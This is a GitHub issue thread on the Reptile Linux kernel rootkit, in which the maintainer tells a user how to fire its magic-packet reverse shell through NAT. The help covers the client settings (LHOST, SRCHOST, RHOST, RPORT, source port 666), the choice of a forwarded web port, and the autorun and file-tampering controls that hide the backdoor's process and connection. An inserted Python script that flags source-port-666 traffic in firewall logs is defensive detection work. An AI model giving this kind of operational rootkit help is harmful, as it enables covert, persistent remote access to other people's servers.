f0rb1dd3n / Reptile

LKM Linux rootkit

Nat #53

Closed ModisDone closed 5 years ago

ModisDone commented 5 years ago

Hi, thank you for this great project! As I read in another topic, it works only in an internal network, but I really need to use it with my VPS. How can I set it up to work through NAT? Does anyone have experience with that? There is no problem with the listener, but the server can't connect to me.

P.S. ./reverse works fine. Probably something with the magic packet, maybe I used it wrong? I run a web server on my VPS; is it possible to send a packet to Apache and trigger the reverse connection?

f0rb1dd3n commented 5 years ago

As you aren't getting problems with the reverse connection, I will assume you are able to figure this part out.

So your only problem is the magic packet. You need to make sure how the firewall is working and doing the NAT redirect. Obviously ICMP won't work, because NAT normally doesn't forward those packets.

You have to figure out what port the firewall is routing to the target server, and send the magic packet on this port. I recommend you use SRCHOST equal to your LHOST, because you can run into some trouble with src spoofing in some firewall rules.

Ex.: If the server is a webserver behind a firewall, you can send your magic packet through port 80 or 443 (TCP obviously) with srchost == lhost, and get your reverse shell in your VPS.

I hope I helped you.

ModisDone commented 5 years ago

So, when I did the setup, I chose the default port 666, now I should change this to 80, right? How can I change it? Where is the config on the server after installation?

f0rb1dd3n commented 5 years ago

The default port 666 is the source port, not the remote port. Reptile accepts the magic packet on any TCP port you want, but the source port has to be 666.

So, use the client to set up the packet for you in your VPS and do the configuration below:

set LHOST [your ip]
set SRCHOST [your ip]
set RHOST [target ip]
set RPORT [target port]
set PROT tcp
set PASS [your pass chosen]

note: SRCPORT must stay 666.

and type run. It should get you your reverse shell.
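The fixed source port is the one network-observable constant in the exchange above: the magic packet may arrive on any destination port the firewall forwards (80/443 in the example), but with the default configuration it always leaves with source port 666. The following is an added detection example, not code from the Reptile project. It parses constructed iptables LOG-style lines (the sample text is made up for this example, not a real capture), flags any flow whose source port is 666, and marks whether the source sits outside RFC 1918 space (the assumption that "internal" means RFC 1918 is this example's, not the thread's).

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List

# Default SRCPORT of the magic packet, as stated in the thread.
SUSPECT_SRC_PORT = 666

# Assumption for this example: protected hosts live in RFC 1918 space;
# any other source address is treated as external.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Constructed sample lines in a simplified iptables LOG style; not real captures.
SAMPLE_LOG = """\
Jan 10 12:00:01 gw kernel: FWD IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP SPT=51234 DPT=443
Jan 10 12:00:02 gw kernel: FWD IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP SPT=666 DPT=80
Jan 10 12:00:03 gw kernel: FWD IN=eth0 OUT=eth1 SRC=198.51.100.9 DST=10.0.0.5 PROTO=ICMP TYPE=8 CODE=0
Jan 10 12:00:04 gw kernel: FWD IN=eth0 OUT=eth1 SRC=192.168.1.20 DST=10.0.0.5 PROTO=TCP SPT=666 DPT=22
Jan 10 12:00:05 gw kernel: FWD IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=10.0.0.5 PROTO=UDP SPT=666 DPT=53
"""

# SPT/DPT are optional so ICMP lines (no ports) still parse and are skipped below.
LINE_RE = re.compile(
    r"SRC=(?P<src>[\d.]+)\s+DST=(?P<dst>[\d.]+)\s+PROTO=(?P<proto>\w+)"
    r"(?:\s+SPT=(?P<spt>\d+)\s+DPT=(?P<dpt>\d+))?"
)


@dataclass(frozen=True)
class Alert:
    src: str
    dst: str
    proto: str
    dst_port: int
    external_src: bool


def is_external(ip: str) -> bool:
    """True when the address is outside the internal (RFC 1918) ranges above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_magic_packet_candidates(log_text: str, src_port: int = SUSPECT_SRC_PORT) -> List[Alert]:
    """Return one Alert per logged flow whose source port equals src_port."""
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m.group("spt") is None:
            continue  # unparsable line, or ICMP: no source port to test
        if int(m.group("spt")) != src_port:
            continue
        alerts.append(Alert(
            src=m.group("src"),
            dst=m.group("dst"),
            proto=m.group("proto"),
            dst_port=int(m.group("dpt")),
            external_src=is_external(m.group("src")),
        ))
    return alerts


def external_alerts(alerts: List[Alert]) -> List[Alert]:
    """Keep only hits from outside the internal ranges (the NAT case in the thread)."""
    return [a for a in alerts if a.external_src]


if __name__ == "__main__":
    for a in find_magic_packet_candidates(SAMPLE_LOG):
        tag = "EXTERNAL" if a.external_src else "internal"
        print(f"[{tag}] {a.proto} {a.src}:{SUSPECT_SRC_PORT} -> {a.dst}:{a.dst_port}")
```

On the sample above this reports three hits (TCP to 80, TCP to 22, UDP to 53), two of them from an external source. Because SRCPORT is a configurable value, a custom build can use a different port, so treat a source-port match as one signal to correlate with an unexpected outbound connection from the same host, not as proof on its own. Legitimate traffic rarely uses a low fixed source port like 666, which keeps the false-positive rate of this rule low on a perimeter log.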

ModisDone commented 5 years ago

It works! Thank you a lot! Next question: how do I remove ./reverse from autorun and uninstall correctly?

f0rb1dd3n commented 5 years ago

1 - disable the file tampering feature with /reptile/reptile_cmd file-tampering
2 - comment the line of reptile_reverse in the file /reptile/reptile_start
3 - enable again the file tampering with /reptile/reptile_cmd file-tampering

To uninstall reptile you only need to run setup.sh remove but you will have to reboot the system to complete the uninstallation.

ModisDone commented 5 years ago

When I installed the first time with the magic packet, I did not remove it, and installed again just reverse in the root directory. Should I just remove the /root/Reptile folder? Because reverse is run from /root/Reptile, not from /reptile/, or are those commands that you wrote above important?

f0rb1dd3n commented 5 years ago

When you send the magic packet, the kernel module will run /reptile/reptile_reverse. So if you are running it by hand in /root/Reptile, you can run it by hand in /reptile too. So you can remove this /root/Reptile.

And there is another detail: /reptile/reptile_reverse is compiled to run with the kernel module, so it communicates with the kernel module to hide its process and its connection. If you've compiled reverse in the standalone version, it will work, but won't communicate with the kernel module; in other words, it is better to use /reptile/reptile_reverse when you already have the kernel module installed.